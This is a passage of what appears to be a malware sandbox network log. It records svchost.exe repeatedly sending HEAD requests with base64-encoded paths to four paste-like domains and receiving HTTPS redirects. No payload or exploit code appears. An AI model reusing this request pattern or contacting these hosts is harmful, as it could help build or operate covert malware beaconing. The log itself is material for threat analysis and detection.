                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              90 | 192.168.2.7 | 50247 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:10.856626034 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:11.339298010 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:11 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oVGnkxFKrmiBxFqWBk%2FDEqqy7WOGRteN%2B%2BoZKw4HdC6gKVaxJ%2BRmsaR3b3Crftg7OT55bo2EH01t9ozUzb9pjGkZygFaW%2BhFUhc41ZAn0Xw0i9i7nzZhIlA1iWTM241XPy1n"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4138c96435b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1584&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              91 | 192.168.2.7 | 50249 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:11.138648987 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:11.596618891 CET | 872 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:11 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCz7ev9q95ohfnsR9zFiZ6503jUt185n53SEYWaPVTgv0NvJ%2B2RvusOKMkntoKOniiLNBBlpPjzLHoH29seh%2FsbmdwaeUocmW7SwAbylDfCNoiVPoO18InRe%2FdgNOw29aFE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4152ecb8c69-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1760&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              92 | 192.168.2.7 | 50251 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:11.345406055 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:11.813663960 CET | 887 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:11 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H4ZltB6Ld%2B4QmvvTbj012N94iHeyKHcxv2Q2u%2BQf%2B%2BeTlHw0vacOlfMuaEhQ%2BTyrOs7mJ1PFDhOQqVIgk%2F%2BraXL1jr8xuDBmVoN%2BjyJRHHaNl2OyHNrL7LVTQtUMjXtyI3%2BJ"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41688a14414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              93 | 192.168.2.7 | 50253 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:11.602885962 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:12.066726923 CET | 853 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MC3eNc3LR6030HP4wEfjkE2To1Qeq6Pnk1ocp0mNyrB7TSteDMn2oenCiRgQNTmtSP1Eb3RnNb7pwinvVRpAHzu78CUokp3cEKBh3LDt0TfXrrephRbDTXfvntb7E0ec"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc418180d41c3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=70&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              94 | 192.168.2.7 | 50258 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:12.073554993 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:12.537415028 CET | 869 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bm1YkZJBSNWwEgKiuN2Tn11AyK4z2fJuSbl8w5sszytbu9gtRtMMYOpnNWoKeAM9Gex5RcOJIKeSxKOg%2BssSjL9b%2B6487mOGKXQIEJEJkmWJ1nScFdOV9sIsFUWm99qqpXCk"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41b084c0f9c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1512&rtt_var=756&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              95 | 192.168.2.7 | 50260 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:12.340502977 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:12.833381891 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hinF8JZid7AkW3NIWPYI26fq6bUfOYOQnNx%2FyJ1N%2F1%2BtQ8bOi5JGFXu7Ql7oo287NrRwY2FbtFKE7OoIHB6s%2Fst%2FS54Qa1Dic3xFfx7gmywVOexQIyXkxdwszv1wDGzoDhs%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41cdc550f5d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2745&min_rtt=2745&rtt_var=1372&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              96 | 192.168.2.7 | 50262 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:12.572257996 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:13.027383089 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eFwZcKht83EfIygwwTTMKS9sy7yvq9wYfXKzscYZH2i6PZZntn1yhV%2FoKQ7nHolrAmdILR4Tjw6%2F5eJYLSXhe14aAJ4vlrglDtDIJXueH5ewxsSLLhtPF%2BLvOfxeodGb2YZX"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41e1dd67c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1907&min_rtt=1907&rtt_var=953&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              97 | 192.168.2.7 | 50264 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:12.855453014 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:13.318712950 CET | 865 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:13 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zk4HeXyP%2BGx%2Flhw9Ia3GvnCRHp%2BtAbhOXWl5YOFvyy%2BoqOrucQooOEbkKA5tdypQIBzmfRZoLTuV7fT1zEgZUckOPTcSIh29bU1uUKcw66F%2F6VUhfDdDpeNSNHdhLEFT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41fed5941f2-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2412&min_rtt=2412&rtt_var=1206&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              98 | 192.168.2.7 | 50270 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:13.325016975 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:13.792431116 CET | 881 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:13 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hm1A6B%2Bee98TpsSDNg5Si2%2B29hFznUOZm%2FQ3gPPH2BG27Mj%2F%2FKHa1hZ33mbrPCsELT%2FdzNJn4vo1PgGkPPIEHe5iGiv3%2BZqGJpFmTiReLCtW%2BcvuVN34PSkgj9P88jI9P5Ft"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc422d9628c39-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1906&rtt_var=953&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              99 | 192.168.2.7 | 50272 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:13.547885895 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:14.002796888 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:13 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HoylEVQHXicjbdHW%2Bv21nwHUfc97GafwzG97yQjMO1Sz1n1yBEtvk17YYTb16eS4oglheNVJ3Pb4AlbgOknJI95fzuv3SP8Z8gyh5H4kFmxXES8dwNMxIouWPrxUZmc8hLY%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4242933c402-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1452&min_rtt=1452&rtt_var=726&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              100 | 192.168.2.7 | 50274 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:13.798412085 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:14.249157906 CET | 881 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:14 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsnECbPaMOOrrXTwmJEJg9SzcNRfCHIede9z4YRU2zDhjcceWgCYP4y%2F6ZLi0uM7PH12oQOUQQLV1T4jpJhQk0pZ2tM%2FY1ot8i%2F0TsIA2wj8o%2FX1tUC8SBd%2FQ%2Fq8KKZbwQAM"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc425c871c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1611&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              101 | 192.168.2.7 | 50276 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:14.011379004 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:14.493922949 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:14 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vEpq38Jg9UTdCm%2BNItCHeNL%2FcE1WxM5MU0psve6LF0miqZEqzpaHFz8MgZSg7a6d6vuMzaNmFA%2FhDH8AhMKWQGTMAROFv3ihxfa5m%2FsCResOe7HiikaBYJZtF780UBr"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4273deec466-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              102 | 192.168.2.7 | 50282 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:14.503729105 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.023123980 CET | 869 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:14 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rsr8QRb637p7aS07l6lgVeYpyjgGufJMartFB80Rvcrfb0AngugbfILSFzBLbk8K0BZPcrEFGg9bw2xfKclNGl4ep8dVmN7%2BJ4IXkJuBRoq8wcjeyngTH5itf%2F52N74CoLhh"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42a8a20c352-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              103 | 192.168.2.7 | 50284 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:14.804464102 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.276155949 CET | 874 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:15 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kxjv1bO2d1HJPSmpB2MtVIe%2F3h6aerFQCDI6fRruu1a7v5oqAIRxVOp6W5rPpFbdVrT065a%2FpMEOtzXfSwAGFSE%2BgDL6QvIxMKvadt%2FOUnsxJAsxMtcJCLHnw3NeCB22IwA%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42c2c8e0f7b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1495&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              104 | 192.168.2.7 | 50286 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:15.031341076 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.482400894 CET | 880 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:15 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y8levdg8xiCaI84%2B4FQ7t%2FSkEvYera3HnUDff7WqiCbkhtNsKm%2BvTT1gwTXYJYGcfy2QbhpT%2Bi06LKi39JQDj9ccyrvsGyYqhoSWCrsY1tCIJMjo81fXH2d2tBqRhCW2AP2%2B"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42d7f9b8ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2983&min_rtt=2983&rtt_var=1491&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              105 | 192.168.2.7 | 50288 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:15.284837008 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.758469105 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:15 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwCn5lgkeBUnqY7JkAQ9rH0p3w2a%2BNT3ocW4okVtQ3e8%2B1nXghy8cSqnT%2BHZEbG%2FRdOb%2FtBpvGjqpDrn%2FROmSdWhWGoQXeFt61FEj5FLEly6uwGRjxWzahTHIzy6f%2BXY"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42f2f0a7d16-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1914&rtt_var=957&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              106 | 192.168.2.7 | 50293 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:15.820755959 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:16.274784088 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:16 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GO0%2BzMFJLoFcHXWXsC8ZJSGSV41AKfcPoHjaxeS7HzxVIPUyrs4V2jwtLwffAer1kwwMUtm4cg967%2BqYvxmWNZf1CiIE0jVMZB2DwGZme94pa7oJsTtqpBft%2FQEmsfo8vkPC"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4326a67f5f7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=756&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
